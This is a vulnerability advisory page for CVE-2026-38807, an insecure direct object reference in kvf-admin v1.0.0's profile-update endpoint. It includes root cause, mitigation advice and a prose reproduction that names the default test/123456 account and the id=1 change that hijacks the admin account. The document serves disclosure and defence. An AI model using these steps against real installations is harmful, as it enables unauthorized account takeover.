VYPR
← All advisories
Unrated severityNVD Advisory· Published May 27, 2026· Updated May 27, 2026

CVE-2026-38807

CVE-2026-38807

Description

Insecure Permissions vulnerability in kvf-admin v1.0.0 allows a remote attacker to escalate privileges via the UserController.java component

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

An IDOR vulnerability in kvf-admin v1.0.0 allows authenticated low-privileged users to modify other users' profiles, leading to privilege escalation.

Vulnerability

An insecure direct object reference (IDOR) vulnerability exists in kvf-admin v1.0.0 within the UserController.java component at the /updateInfo endpoint (lines 108-112). The interface requires only an authenticated session, lacks any permission annotation, and performs no object ownership validation. It directly updates user records based on the submitted user.id parameter, allowing an attacker to modify profiles of arbitrary users, including administrators [1].

Exploitation

An attacker must first authenticate as a low-privileged user (e.g., the default test account). The attacker then sends a POST request to the /updateInfo endpoint with a crafted payload containing the target user's id and desired modifications. No additional privileges or user interaction are required beyond the initial authentication [1].

Impact

Successful exploitation enables the attacker to modify any user's profile, including the administrator account. This can result in privilege escalation (e.g., changing the admin's password or email), denial of service by locking the admin out, or full account takeover. The attacker gains the ability to alter sensitive user data without authorization [1].

Mitigation

As of the available reference, no official patch or fixed version has been released for kvf-admin v1.0.0. The vendor should implement proper permission checks (e.g., @RequiresPermissions annotations) and enforce object ownership validation in the updateInfo method. Until a fix is available, administrators should restrict access to the vulnerable endpoint or apply custom access controls [1].

References
  1. CVE Report: IDOR Privilege Escalation in kvf-admin User Profile Update

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing object-level authorization in the profile update endpoint allows any authenticated user to modify any other user's account by supplying an arbitrary user ID."

Attack vector

An authenticated low-privileged user sends a POST request to `/sys/user/updateInfo` with a crafted `id` parameter pointing to another user (e.g., `id=1` for the admin) [ref_id=1]. The server binds the submitted form parameters—including `id`, `username`, and other profile fields—directly to a `User` object and updates the database record without verifying that the requester owns that user ID [ref_id=1]. This allows any logged-in user to overwrite the administrator's username and credentials, effectively taking over the admin account [ref_id=1].

Affected code

The vulnerable endpoint is in `UserController.java` at lines 108–112, specifically the `updateInfo` method mapped to `POST /sys/user/updateInfo` [ref_id=1]. The method accepts a `User` object directly from the HTTP request and calls `userService.updateById(user)` without any ownership or permission checks [ref_id=1].

What the fix does

No patch has been published for kvf-admin v1.0.0 [ref_id=1]. The advisory recommends three remediations: (1) do not trust client-submitted `id` fields—instead bind updates to the authenticated user identity from the server-side session/token; (2) enforce authorization checks (role-based or object-level access control) before executing `updateById`; and (3) use allowlists and separate privileged APIs for sensitive fields such as username, role, and status [ref_id=1].

Preconditions

  • authAttacker must have a valid authenticated session as a low-privileged user (e.g., test/123456)
  • configThe target application must be kvf-admin v1.0.0 with the vulnerable endpoint exposed
  • networkAttacker must be able to send HTTP POST requests to /sys/user/updateInfo
  • inputAttacker must supply a crafted id parameter in the request body (e.g., id=1 for admin)

Reproduction

Log in as the default low-privileged user `test/123456`. Navigate to the personal profile page and intercept the update request. Change `id=3` (the test user's ID) to `id=1` (the admin's ID) and modify `username` to any arbitrary string. Send the crafted POST request to `/sys/user/updateInfo`. The admin account's username is overwritten, and the original admin credentials no longer work—the attacker can now log in with the new username and the original password [ref_id=1].

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1

News mentions

0

No linked articles in our index yet.